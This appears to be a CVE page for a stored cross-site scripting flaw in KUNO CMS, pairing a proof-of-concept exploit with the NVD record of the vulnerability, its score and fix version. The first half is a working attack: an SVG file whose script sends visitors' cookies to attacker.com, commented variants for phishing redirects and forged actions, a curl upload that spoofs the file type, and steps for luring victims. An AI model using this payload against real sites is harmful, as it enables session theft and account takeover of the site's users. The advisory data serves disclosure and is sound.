CVE-2025-61681

<!-- Malicious SVG file for Stored XSS exploitation in KUNO CMS --> <!-- Save as evil.svg and upload with Content-Type: image/png --> <?xml version="1.0" encoding="UTF-8"?> <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200"> <script type="text/javascript"> // XSS payload: steal cookies and redirect to attacker server var cookie = document.cookie; var img = new Image(); img.src = "https://attacker.com/steal?cookie=" + encodeURIComponent(cookie); // Alternative: redirect user to phishing page // window.location = "https://attacker.com/phishing"; // Alternative: perform actions on behalf of user // fetch('/api/some-action', {method: 'POST', credentials: 'include'}); </script> <rect x="0" y="0" width="200" height="200" fill="blue"/> <text x="50" y="100" fill="white">Image</text> </svg> # Exploitation steps: # 1. Create the malicious SVG file above # 2. Use curl or a script to upload it to KUNO CMS with modified Content-Type header: # # curl -X POST https://target-kuno-cms.com/upload \ # -H "Content-Type: multipart/form-data" \ # -F "[email protected];type=image/png" # # 3. Obtain the uploaded file URL from the response # 4. Share the URL with victims or embed it in a blog post # 5. When victims view the page, the JavaScript executes in their browser

{"cve": {"id": "CVE-2025-61681", "sourceIdentifier": "[email protected]", "published": "2025-10-03T22:15:32.880", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "KUNO CMS is a fully deployable full-stack blog application. Versions 1.3.13 and below contain validation flaws in its file upload functionality that can be exploited for stored XSS. The upload endpoint only validates file types based on Content-Type headers, lacks file content analysis and extension whitelist restrictions, allowing attackers to upload SVG files containing malicious scripts (disguised as images). When users access the uploaded resource pages, arbitrary JavaScript executes in their browsers. This issue is fixed in version 1.3.14."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://github.com/xuemian168/kuno/commit/fc486b5c9091b607f82bf7b354d18f25204f7dc6", "source": "[email protected]"}, {"url": "https://github.com/xuemian168/kuno/releases/tag/v1.3.14", "source": "[email protected]"}, {"url": "https://github.com/xuemian168/kuno/security/advisories/GHSA-q3w2-2vqp-gx3r", "source": "[email protected]"}]}}